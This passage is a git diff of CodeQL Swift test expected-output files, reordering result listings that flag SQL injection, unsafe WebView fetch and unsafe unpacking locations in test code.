+| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | +| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected index d796aa2da25e..c2fefc171e64 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected @@ -1,22 +1,3 @@ -#select -| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | edges | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:117:21:117:35 | call to getRemoteData() | provenance | | | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | provenance | | @@ -154,3 +135,22 @@ nodes | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | semmle.label | htmlData | | UnsafeWebViewFetch.swift:211:25:211:25 | htmlData | semmle.label | htmlData | subpaths +#select +| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 9e91919d5c57..36ebcd04a6ee 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -1,117 +1,3 @@ -#select -| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query 